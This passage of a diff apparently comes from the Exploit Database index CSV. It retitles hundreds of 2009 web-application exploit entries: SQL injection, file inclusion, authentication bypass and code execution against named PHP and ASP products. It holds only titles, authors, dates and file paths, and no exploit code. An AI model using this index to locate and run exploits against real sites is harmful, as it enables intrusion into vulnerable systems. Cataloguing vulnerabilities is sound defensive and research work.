'id' Parameter Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' Parameter SQL Injection",2009-01-04,DaiMon,php,webapps,0 -7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 +7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - 'index.php id' SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0 @@ -20460,7 +20463,7 @@ id,file,description,date,author,platform,type,port 7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7699,platforms/php/webapps/7699.txt,"QuoteBook - Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0 -7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - (ip ban) Cross-Site Scripting / Command Execution (Administrator Required)",2009-01-08,StAkeR,php,webapps,0 +7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - 'ip ban' Authorized Cross-Site Scripting / Command Execution",2009-01-08,StAkeR,php,webapps,0 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0 7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0 @@ -20517,7 +20520,7 @@ id,file,description,date,author,platform,type,port 7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps,0 7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Arbitrary File Download",2009-01-14,ajann,asp,webapps,0 7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Arbitrary File Upload",2009-01-15,ajann,asp,webapps,0 -7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 - (08.12.29) Local File Inclusion",2009-01-15,flyh4t,php,webapps,0 +7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 (08.12.29) - Local File Inclusion",2009-01-15,flyh4t,php,webapps,0 7793,platforms/php/webapps/7793.php,"Joomla! Component com_Eventing 1.6.x - Blind SQL Injection",2009-01-15,InjEctOr5,php,webapps,0 7795,platforms/php/webapps/7795.txt,"Joomla! Component RD-Autos 1.5.5 - SQL Injection",2009-01-15,H!tm@N,php,webapps,0 7796,platforms/php/webapps/7796.txt,"MKPortal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0 @@ -20586,37 +20589,37 @@ id,file,description,date,author,platform,type,port 7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - 'id' Parameter Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,php,webapps,0 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin",2009-01-28,x0r,php,webapps,0 -7895,platforms/php/webapps/7895.txt,"Gazelle CMS - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0 +7895,platforms/php/webapps/7895.txt,"Gazelle CMS 1.0 - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,php,webapps,0 7897,platforms/php/webapps/7897.php,"phpList 2.10.x - (Remote Code Execution by environ Inclusion) Local File Inclusion",2009-01-28,mozi,php,webapps,0 7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - 'submit_post.php' SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0 7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0 -7900,platforms/php/webapps/7900.txt,"Social Engine - (category_id) SQL Injection",2009-01-28,snakespc,php,webapps,0 -7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - (articles.php var) Blind SQL Injection",2009-01-28,certaindeath,php,webapps,0 +7900,platforms/php/webapps/7900.txt,"Social Engine 3.06 - 'category_id' Parameter SQL Injection",2009-01-28,snakespc,php,webapps,0 +7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - Blind SQL Injection",2009-01-28,certaindeath,php,webapps,0 7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps,0 -7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0 +7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0 7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote File Upload",2009-01-29,"Michael Brooks",php,webapps,0 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0 7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - Authentication Bypass",2009-01-29,"Mehmet Ince",php,webapps,0 -7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0 +7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0 7922,platforms/php/webapps/7922.txt,"Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 7924,platforms/asp/webapps/7924.txt,"SalesCart - Authentication Bypass",2009-01-30,ByALBAYX,asp,webapps,0 7925,platforms/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0 -7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 +7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 (09.01.30) - Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - Authentication Bypass",2009-01-30,Dimi4,php,webapps,0 -7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0 +7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - SQL Injection",2009-01-30,darkjoker,php,webapps,0 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0 7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps,0 7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps,0 -7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - (blaster_user) Blind SQL Injection",2009-02-02,darkjoker,php,webapps,0 +7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - Blind SQL Injection",2009-02-02,darkjoker,php,webapps,0 7945,platforms/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution",2009-02-02,darkjoker,php,webapps,0 7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,php,webapps,0 7947,platforms/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution",2009-02-02,Osirys,php,webapps,0 -7948,platforms/php/webapps/7948.php,"phpslash 0.8.1.1 - Remote Code Execution",2009-02-02,DarkFig,php,webapps,0 +7948,platforms/php/webapps/7948.php,"PHPSlash 0.8.1.1 - Remote Code Execution",2009-02-02,DarkFig,php,webapps,0 7949,platforms/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 - eval() Code Execution (Metasploit)",2009-02-02,LSO,php,webapps,0 18164,platforms/android/webapps/18164.php,"Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 @@ -20627,7 +20630,7 @@ id,file,description,date,author,platform,type,port 7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - Authentication Bypass",2009-02-03,x0r,php,webapps,0 7959,platforms/php/webapps/7959.txt,"Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing",2009-02-03,Xianur0,php,webapps,0 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps,0 -7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - (photo.php id) Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0 +7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - 'photo.php id' Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0 7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0 7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0 7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0 @@ -20639,7 +20642,7 @@ id,file,description,date,author,platform,type,port 7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - (synTarget) Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0 7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0 7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusion",2009-02-04,make0day,php,webapps,0 -7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - (bbcode.php l) Local File Inclusion",2009-02-04,Osirys,php,webapps,0 +7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php l' Local File Inclusion",2009-02-04,Osirys,php,webapps,0 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0 7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0 7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0 @@ -20658,7 +20661,7 @@ id,file,description,date,author,platform,type,port 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0 -8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - (frame.php id) Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 +8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'frame.php id' Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0 @@ -20667,11 +20670,11 @@ id,file,description,date,author,platform,type,port 8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8018,platforms/php/webapps/8018.txt,"FlexCMS - (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0 -8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 - (09.01.22) Cross-Site Scripting",2009-02-09,make0day,php,webapps,0 +8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) - Cross-Site Scripting",2009-02-09,make0day,php,webapps,0 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0 -8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - (gastbuch.php) Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0 +8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0 8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,php,webapps,0 8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0 8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0 @@ -20685,10 +20688,10 @@ id,file,description,date,author,platform,type,port 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0 8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure",2009-02-11,"Mehmet Ince",php,webapps,0 -8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - (editcomments.php id) SQL Injection",2009-02-11,Osirys,php,webapps,0 -8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - (searchmatch.php) SQL Injection",2009-02-11,nuclear,php,webapps,0 +8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'editcomments.php id' SQL Injection",2009-02-11,Osirys,php,webapps,0 +8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - 'searchmatch.php' SQL Injection",2009-02-11,nuclear,php,webapps,0 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0 -8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - (viewer.php id) SQL Injection",2009-02-12,x0r,php,webapps,0 +8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'viewer.php id' SQL Injection",2009-02-12,x0r,php,webapps,0 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0 @@ -20712,11 +20715,11 @@ id,file,description,date,author,platform,type,port 8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,php,webapps,0 8075,platforms/php/webapps/8075.pl,"Firepack - 'admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps,0 8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0 -8083,platforms/php/webapps/8083.txt,"phpBB 3 - (autopost bot mod 0.1.3) Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 -8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 -8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - (admin.dat) File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 +8083,platforms/php/webapps/8083.txt,"phpBB 3 - 'autopost bot mod 0.1.3' Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 +8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 +8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 -8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - (admin.txt) File Disclosure",2009-02-20,Pouya_Server,php,webapps,0 +8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - 'admin.txt' File Disclosure",2009-02-20,Pouya_Server,php,webapps,0 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection (via SQL Injection)",2009-02-20,Osirys,php,webapps,0 8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated",2009-02-23,ahmadbady,php,webapps,0 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,php,webapps,0 @@ -20794,8 +20797,8 @@ id,file,description,date,author,platform,type,port 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0 8252,platforms/php/webapps/8252.txt,"Pixie CMS - Cross-Site Scripting / SQL Injection",2009-03-20,"Justin Keane",php,webapps,0 8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - (UserGallery) Blind SQL Injection",2009-03-23,Invisibility,php,webapps,0 -8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0 -8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - (get_read.php section) SQL Injection",2009-03-23,dun,php,webapps,0 +8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - 'valor.php noticia' SQL Injection",2009-03-23,p3s0k!,php,webapps,0 +8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - 'get_read.php section' SQL Injection",2009-03-23,dun,php,webapps,0 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution",2009-03-23,YOUCODE,php,webapps,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - Command Execution (via SQL Injection)",2009-03-23,darkjoker,php,webapps,0 @@ -20803,9 +20806,9 @@ id,file,description,date,author,platform,type,port 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - (name) Local File Inclusion",2009-03-24,dun,php,webapps,0 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b C1 HFP1 - Privilege Escalation",2009-03-24,Nine:Situations:Group,php,webapps,0 -8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0 +8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - 'view.php id' SQL Injection",2009-03-24,x0r,php,webapps,0 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0 -8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - (upldgallery.php) Arbitrary File Upload",2009-03-25,"Ahmad Pay",php,webapps,0 +8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - 'upldgallery.php' Arbitrary File Upload",2009-03-25,"Ahmad Pay",php,webapps,0 8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,php,webapps,0 8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusion",2009-03-26,ahmadbady,php,webapps,0 8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,php,webapps,0 @@ -20830,7 +20833,7 @@ id,file,description,date,author,platform,type,port 8328,platforms/php/webapps/8328.txt,"webEdition 6.0.0.4 - (WE_LANGUAGE) Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 8329,platforms/php/webapps/8329.txt,"JobHut 1.2 - Remote Password Change/Delete/Activate User",2009-03-31,"ThE g0bL!N",php,webapps,0 8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 - (course_id) SQL Injection",2009-03-31,DarKdewiL,php,webapps,0 -8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 - (gamestat.php gameID) SQL Injection",2009-03-31,Dimi4,php,webapps,0 +8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 - 'gamestat.php gameID' SQL Injection",2009-03-31,Dimi4,php,webapps,0 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion",2009-04-01,ahmadbady,php,webapps,0 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' Parameter SQL Injection",2009-04-01,cOndemned,php,webapps,0 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0 @@ -20854,7 +20857,7 @@ id,file,description,date,author,platform,type,port 8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 - 'db.mdb' Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0 8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 - SEC_authenticate() SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps,0 8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure",2009-04-09,AlpHaNiX,asp,webapps,0 -8379,platforms/asp/webapps/8379.txt,"Back-End CMS 5.0 - (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0 +8379,platforms/asp/webapps/8379.txt,"Back-End CMS 5.0 - 'main.asp id' SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0 8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0 8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - Authentication Bypass",2009-04-09,Osirys,php,webapps,0 8383,platforms/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 @@ -20877,14 +20880,14 @@ id,file,description,date,author,platform,type,port 8423,platforms/php/webapps/8423.txt,"Jamroom 4.0.2 - 't' Parameter Local File Inclusion",2009-04-14,zxvf,php,webapps,0 8424,platforms/php/webapps/8424.txt,"ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection",2009-04-14,DSecRG,php,webapps,0 8425,platforms/php/webapps/8425.txt,"PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting",2009-04-14,SirDarckCat,php,webapps,0 -8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0 +8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - 'index.php lang' Local File Inclusion",2009-04-14,SirGod,php,webapps,0 8432,platforms/php/webapps/8432.txt,"Aqua CMS - 'Username' SQL Injection",2009-04-14,halkfild,php,webapps,0 8433,platforms/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injections",2009-04-14,Dimi4,php,webapps,0 8435,platforms/php/webapps/8435.txt,"phpEmployment - 'conf.inc' File Disclosure",2009-04-14,InjEctOr5,php,webapps,0 8436,platforms/php/webapps/8436.txt,"Job2C 4.2 - (profile) Arbitrary File Upload",2009-04-15,InjEctOr5,php,webapps,0 8437,platforms/php/webapps/8437.txt,"phpAdBoard - 'conf.inc' Remote Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8438,platforms/php/webapps/8438.txt,"phpGreetCards - Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8439,platforms/php/webapps/8439.txt,"W2B Restaurant 1.2 - (conf.inc) Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8439,platforms/php/webapps/8439.txt,"W2B Restaurant 1.2 - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8440,platforms/php/webapps/8440.txt,"phpAdBoardPro - 'config.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8441,platforms/php/webapps/8441.txt,"phpDatingClub - 'conf.inc' File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 @@ -20896,8 +20899,8 @@ id,file,description,date,author,platform,type,port 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0 8455,platforms/php/webapps/8455.txt,"CPCommerce 1.2.8 - 'id_document' Parameter Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 -8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - (ficha.php) SQL Injection",2009-04-16,snakespc,php,webapps,0 -8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 +8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - 'ficha.php' SQL Injection",2009-04-16,snakespc,php,webapps,0 +8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - 'manage-admin.php' Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0 @@ -20924,7 +20927,7 @@ id,file,description,date,author,platform,type,port 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - Authentication Bypass",2009-04-20,"Salvatore Fresta",php,webapps,0 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps,0 -8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - (whoisonline.php) PHP Code Injection",2009-04-21,EgiX,php,webapps,0 +8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - 'whoisonline.php' PHP Code 